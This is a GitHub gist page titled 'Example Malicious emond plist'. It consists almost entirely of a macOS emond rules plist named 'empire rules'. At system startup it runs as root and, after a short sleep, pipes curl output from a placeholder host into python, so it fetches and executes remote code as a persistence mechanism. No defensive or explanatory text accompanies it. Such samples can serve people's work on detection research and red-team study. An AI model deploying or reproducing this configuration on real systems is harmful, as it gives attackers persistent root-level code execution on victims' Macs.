Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Example Malicious emond plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>empire rules</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
<array>
<string>startup</string>
</array>
<key>actions</key>
<array>
<dict>
<key>command</key>
<string>/bin/sleep</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>10</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
<dict>
<key>command</key>
<string>/bin/bash</string>
<key>user</key>
<string>root</string>
<key>arguments</key>
<array>
<string>-c</string>
<string>curl 'http://host/hello-from-emond' | python &amp;</string>
</array>
<key>type</key>
<string>RunCommand</string>
</dict>
</array>
</dict>
</array>
</plist>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment